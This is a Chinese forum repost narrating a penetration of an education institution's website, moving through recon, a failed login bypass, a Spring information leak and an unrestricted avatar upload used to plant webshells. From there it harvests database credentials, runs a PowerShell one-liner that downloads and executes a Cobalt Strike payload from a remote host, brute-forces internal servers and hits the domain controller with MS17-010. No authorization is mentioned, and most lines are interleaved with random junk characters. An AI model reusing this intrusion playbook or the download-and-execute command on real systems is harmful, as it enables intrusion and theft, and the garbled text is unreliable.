|
. j2 q7 }; B% \! c9 x
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路% Q5 I: I7 L; ^ n2 D& C- ?
5 S9 c0 F1 Y3 F9 b7 `9 m8 v( [! Z! G I* s
/ P+ I5 k. e7 V
; d9 @* v- U7 Y, e/ ^
9 C, w9 w- w" c y 正文
5 a9 n# n `4 h) e& v- a + U5 c/ w/ B$ b
2 h" a+ m2 Y4 o8 L' ~
0 S/ ~" b: j c5 W1 ]4 s# X
$ ^4 `' c Y3 u4 e
1 Y: z1 X, [& j, {
目标:www.xxxx.com(一家教育机构)
+ ^( a: W( H5 A
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, K; J0 T) Y$ I1 S: P ?( M
$ t$ i- g$ w4 D* V! I# H( U+ g$ g2 u% j' N2 p( t1 U
7 k) g3 H! m0 Q + I0 T/ q/ Z2 n3 S$ G$ l
6 g5 O2 s2 N, _9 I6 k1 u/ B2 m
进行了简单的信息搜集
- M6 e" w- `' m v: G
, v# k. P( ^+ p2 t
4 Y/ l* f! J3 W c; ?- I
3 d. }# o- H- W! }' w, V% F& J% [; t5 T" \6 V( R2 S4 C' J
子域名搜集
) A/ ~5 F; d+ P* G; N7 x7 A 5 p( D' M0 F) W) R
2 [; ~$ M+ x' Q/ h) K* J* f6 H7 G 
- ] N5 w0 O7 l) W* h
0 o3 P- H" p6 p' P# F
0 k0 r: j( U( {0 S fofa找资产
5 t3 g! z+ _1 @8 i9 X$ D
2 K: [ _4 S6 [' D7 H2 h2 G8 O& [
$ K9 S! t7 { R- m' h+ n. J: l
/ h3 C- v4 x1 W+ w0 W& R' H% S9 I$ z8 C" d2 ?) e3 u: Q1 \- i
 - k% n0 G/ t7 \) q$ F
6 }' R) E% g$ x; s/ x+ E1 F8 ~: l2 I+ E/ q: E5 ?1 q; T& w
一共七个资产。去重之后只有两个。
% w) V, b$ L# J/ C# d: Q
; Z1 n- s3 [- X9 K p* h2 Y
& L. g# m& _$ s - I, p2 u( Z2 p
! Y# @: `3 \6 X# x7 q( Z. y# A' R' ? 目录探测0 w: ~+ h5 y5 P& \
" B( u5 R: N- ]. l: C
. ^& q$ \) T, `, s+ k  8 a3 g5 T4 ~$ r* p0 v$ T1 h. @ L
& B7 a" d" j/ s+ k! G) X8 y
/ R& a7 d3 K& _ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
2 T# B# Z; y5 a% |0 B8 D
$ ~. ?, }* C$ ?3 S8 c
5 i. u4 E! w/ O7 H. @ 9 S) n7 }7 c) H* k$ g) Z2 x$ B
6 D' @2 b/ Q' l# P
我又尝试了通过修改返回包来绕过登录界面
* q# `8 ~; m$ R9 F1 L
# z+ Z8 P' X- u4 ]/ a7 l! _4 W# ]0 @
$ R& `1 R1 H/ y/ `  ) F! K+ C- @ N, H
4 S) l/ H7 t, I2 p3 X" \+ z8 U7 U; i
" m5 c [' _! h) [5 \6 O; B 还是不行,尝试注入无果/ Q) O( g) f, Y0 g
" v0 t% v, c( @# c" Z) l [
+ ?; N8 l- T3 U% e9 h4 I! B
* M# R# w6 _% i# |3 D: Q8 {" n
. p# |5 o' B" `( b1 c0 {
1 C- u: t! F- z* n7 K# B- j: w 不过我目录探测出了一处Spring信息泄露
8 _) U% w/ f4 [$ d
" g/ I% J. Q4 j9 e( @$ d! m( f! T, `3 f: n
4 a3 U. u& ]- X: `5 o3 m
% K' ~) \' u# U3 Z; y  , Y) ?" U: x$ [" x2 P: a
$ W; s* K( l1 w, w N: W5 I& V/ L
: ]4 @5 L% w. M6 }6 i) Y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
9 W' c2 w& ?2 z) n8 i' |' k
1 M7 H' ?4 N5 ?: m8 s* `0 U
% \9 x4 d; K# I 
2 e- A2 f% S3 u9 e2 X+ V " x0 G7 |- L" h: ?
* P' L+ }6 R, O0 [/ g7 H5 Y* ^6 x
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
; q# c( q7 b5 o% i" k" [2 w- V
# i6 y7 G0 P: n& `
2 x5 T0 Y. ~. W 
2 [# w, M% M/ g7 P. t1 v 3 t% b1 i6 W1 @. V& {
5 A: `+ _5 c* i6 Z: \/ B
获取有些师傅到这一步就手机抓包电脑测了。
% ]0 q# {8 v8 X; q+ r. y - s+ H8 H& ?- A% }; N0 b
7 F) e) e/ P" a) C- [5 a# r
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 ^9 }; L _: D0 i# s
5 p2 p; I7 ?& I+ l9 a
2 F9 r% n$ z0 F2 ^' \1 w, P
其中在一个公众号发现了小程序,可以进行注册。
9 I' S+ l( ?& y K. Q
( g; e0 A) @/ g- l& P. }7 Y- o. [$ P5 c; n* T* \$ {
看到了头像上传,尝试上传获取WebShell
' z% @6 B8 P2 Q9 H) u7 a) g
% S$ d4 }& H8 n( g/ j% o. S' l* y
4 w: a5 Z. r& g6 w; @! k 8 ?$ ~2 X. Z( W/ I
6 d" j$ s/ }- q% K6 g 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
9 U& z7 |/ Z q P |- }8 ]6 @5 f
9 \3 K/ }3 d3 Z/ j3 s# |7 _8 }' u- ? 
2 `' Y4 v* f" ` w/ h 4 t& S7 ~0 W9 [; ?' `
, I; t" z9 n& G) v) r 然后上了大马. k; W8 k$ X* x- ?+ `
9 _9 S# j* v5 }, _5 j
+ f. x) V/ j2 a 
( n0 `( Z& m) a6 @( `6 } ! x! \0 Z# e; F* a) ]% }) H
. P' K. q% @: U: i
 % e# r6 X& F m$ w) e I3 I+ ]; K
7 C2 v6 m; D; f: ^5 H( N9 l) o9 {& ]* E1 G
通过翻找文件发现数据库账号密码
, f% x! v2 A' b3 S+ Z
$ r2 ?2 M0 b: e9 I0 T. e1 N+ J; n5 b7 \8 {3 h. ^- Z
 4 X8 u% I. e8 f- @
2 h9 P& ]$ h2 Z* E4 R
7 L: ]3 Y7 j8 H' U* d
--内网渗透
2 `- x1 a7 s. L / g2 F" B, ~. [( n) I
" u/ t4 W/ a- A' ? 直接通过powershell执行 cs上线. f! k7 [6 W: h- N+ I+ p
% ~ I K% } ?9 o. }4 K D6 o
* B; c$ B- Q1 O5 D8 n powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
3 ]+ G# y) C. H. l( B4 e+ \) ?. S. B , @8 F9 \, \7 s; g) p( w% ?9 W: g w
& E* F; {. T$ d. Q, k0 d 
0 G- b; z! I+ O5 W3 c* K8 p
' _ k, {$ L* q* m2 q
+ F1 U+ C8 Q: l5 K1 v2 q3 a% [ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破: \2 C I/ S( a) A$ ^- Z
% l' }' d2 \0 g4 U, ]# i; w3 i5 Z7 M' n2 S, q
 ) H u, f* Y5 \8 e, T2 J. g4 W
" Z$ J" C! Y" F, t
' b3 y* |/ U6 Q4 t- X7 X
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 X+ _1 ?0 l. G. T! v
1 K$ e' d7 h( u9 w5 e
1 D6 n1 D* _: { r- P* I
1 j6 W, O0 W4 ? b, ~
0 j. {1 q& T, O+ N6 d/ K6 u2 _, F2 D8 J& ]% d( ` a# H
: j2 ~/ z' A# Q
* O. `. N3 g( m. e1 _# d% M) z
! {! d% C+ l# y0 _/ c( w! ?: }& q 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 J- ~" M3 t# R! X }
3 l5 X1 ~( L1 _# t: g; ]" B) i- s3 [3 h/ r. Y( j
4 i6 `, _* h+ @6 J
1 C; R n) g$ N  & \+ S; ^; r0 m% i& \
7 {. l7 ]' ^! ^
/ ~/ Y! _, X& ]" X8 f, ^# E
3 s7 d. F3 h, [( d4 ?, ^ V! B
2 y" m1 Z$ g+ R( h9 d R
: k5 U: U" o: n/ i4 f
+ @- m: W* V, z; ~0 {7 D) D4 f8 }5 a. i
' c& P9 i4 \( g8 Z2 L, W* b 2 C) s% G/ V- i. \
9 j! f& t, a! j- Y4 b6 t
小结
, b- m! {9 M( C+ G' G " D# ]' D" p. ?" U
2 F0 J0 ~( s9 ]8 n
( c4 d9 p0 C& P% `" c
! k, R7 Z% e/ V t6 D
$ g4 M: k5 H4 W/ s* p
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 P; F W3 L9 H- [1 F
2 H, H6 E/ y* f3 ?2 Y
* h6 \9 L' ^0 X6 F9 }9 T
% D, p- ^) E9 w/ T# i# @ + m0 m+ u' H" {
% M% G( }1 j2 C& Q/ n/ v: R - . M3 k7 _ Q- M. Q
- X) h0 f4 J1 k2 `
. j* \& P2 {* k9 S- V
- ( w: T/ L3 i5 @
& _0 G! [7 x7 L
/ H0 Q6 o8 ~" z7 n! X: F! n
( y) \) g* H. F7 u$ B% F! O1 _# F4 \. q; b& p6 n. f9 e* z
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* t# @: p: n' _$ m& S
; R5 o4 U/ ~( I% i1 `; M8 K( `# L) L7 M( O" G
5 v0 I' e6 o3 {8 @ | 
发表于 2024-3-1 19:41:32
收藏
支持
反对